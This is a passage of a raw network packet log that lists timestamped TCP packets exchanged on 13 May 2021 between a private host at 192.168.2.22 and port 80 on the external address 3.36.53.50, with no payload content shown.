May 13, 2021 08:29:33.809286118 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.809299946 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.809312105 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.809333086 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.809338093 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.809362888 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.809376955 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.809418917 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.809418917 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.809446096 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.809457064 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.809473991 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.809484005 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.809500933 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.809509993 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.809526920 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.809540987 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.809555054 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.809564114 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.809581995 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.809593916 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.809616089 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.809624910 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.809645891 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.809654951 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.809673071 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.809684992 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.809700966 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.809710979 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.809729099 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.809741020 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.809756041 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.809767962 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.809783936 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.809792995 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.809811115 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.809823990 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.809844971 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.809849024 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.809875011 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.809884071 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.809901953 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.809912920 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.809928894 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.809938908 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.809956074 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.809972048 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.809983015 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.809997082 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.810010910 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.810019970 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.810039043 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.810049057 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.810072899 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.810081959 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.810102940 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.810110092 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.810128927 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.810139894 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.810157061 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.810167074 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.810184002 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.810198069 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.810209990 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.810225010 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.810236931 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.810246944 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.810264111 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.810273886 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.810297966 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.810307026 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.810328960 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.810337067 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.810355902 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.810367107 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.810384989 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.810391903 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.810411930 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.810421944 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.810439110 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.810451984 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.810467005 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.810478926 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.810492992 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.810503006 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.810527086 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.810535908 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.810556889 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.810568094 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.810584068 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.810595989 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.810611963 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.810621977 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.810638905 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.810648918 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.810666084 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.810682058 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.810693026 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.810700893 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.810720921 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.810729980 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.810755014 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.810764074 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.810785055 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.810794115 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.810811043 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.810822010 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.810838938 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.810848951 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.810867071 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.810878992 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.810893059 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.810909033 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.810921907 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.810926914 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.810949087 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.810959101 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.810982943 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.810992002 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.811013937 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.811024904 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.811039925 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.811049938 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.811068058 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.811077118 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.811095953 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.811105967 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.811122894 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.811136007 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.811151028 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.811160088 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.811177969 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.811189890 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.811211109 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.811219931 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.811240911 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.811249018 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.811268091 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.811280012 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.811295986 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.811306000 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.811323881 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.811336994 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.811351061 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.811362028 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.811378956 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.811388969 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.811407089 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.811415911 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.811440945 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.811450005 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.811470985 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.811479092 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.811497927 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.811508894 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.811525106 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.811537981 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.811553001 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.811564922 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.811579943 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.811590910 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.811608076 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.811619997 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.811646938 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.092137098 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.092196941 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.092227936 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.092417955 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.092461109 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.092466116 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.108141899 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.108237982 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.108268023 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.108298063 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.108338118 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.108375072 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.108417034 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.108453989 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.108458996 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.108485937 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.108489037 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.108491898 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.108494997 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.108498096 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.108500957 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.108503103 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.108515978 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.108545065 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.108556986 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.108582020 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.108620882 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.108658075 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.108664989 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.108694077 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.108697891 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.108704090 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.108732939 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.108736992 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.108750105 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.108762980 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.108791113 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.108810902 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.108853102 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.108890057 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.108930111 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.108971119 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.109009027 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.109049082 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.109087944 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.109134912 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.109175920 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.109213114 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.109251976 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.109291077 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.109327078 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.109358072 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.109364033 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.109446049 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.109489918 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.109536886 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.109550953 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.109568119 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.109570980 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.109579086 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.109596968 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.109606028 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.109611034 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.109615088 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.109616041 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.109617949 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.109621048 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.109652996 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.109666109 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.109675884 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.109683990 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.109688997 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.109692097 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.109693050 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.109695911 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.109699011 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.109700918 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.109728098 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.109744072 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.109762907 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.109766006 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.109766960 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.109771013 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.109777927 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.109805107 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.109810114 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.109843016 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.109850883 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.109875917 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.109893084 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.109914064 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.109930038 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.109942913 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.109968901 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.109992981 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.110007048 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.110023022 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.110044003 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.110058069 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.110084057 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.110105038 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.110122919 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.110135078 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.110171080 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.110183001 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.110212088 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.110229969 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.110248089 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.110260010 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.110285997 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.110305071 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.110323906 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.110337019 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.110362053 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.110382080 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.110399008 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.110413074 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.110439062 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.110440969 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.110486984 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.110495090 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.111486912 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.111749887 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.220040083 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.220402002 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.385549068 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.385586977 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.385787964 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.385847092 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.405730963 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.405783892 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.405816078 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.405848026 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.405879974 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.405919075 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.405952930 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.405958891 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.405985117 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.406017065 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.406049013 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.406054974 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.406064034 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.406068087 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.406071901 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.406075954 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.406080008 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.406080008 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.406112909 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.406128883 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.406141043 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.406143904 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.406147003 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.406167030 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.406172991 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.406183004 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.406213999 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.406218052 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.406249046 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.406250954 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.406279087 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.406280994 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.406312943 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.406325102 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.406343937 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.406377077 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.406408072 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.406446934 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.406471968 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.406512976 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.406516075 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.406548977 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.406549931 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.406584024 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.406585932 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.406613111 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.406624079 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.406660080 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.406660080 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.406697989 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.406716108 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.406727076 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.406734943 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.406759024 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.406781912 CEST	80	49167	3.36.53.50	192.168.2.22
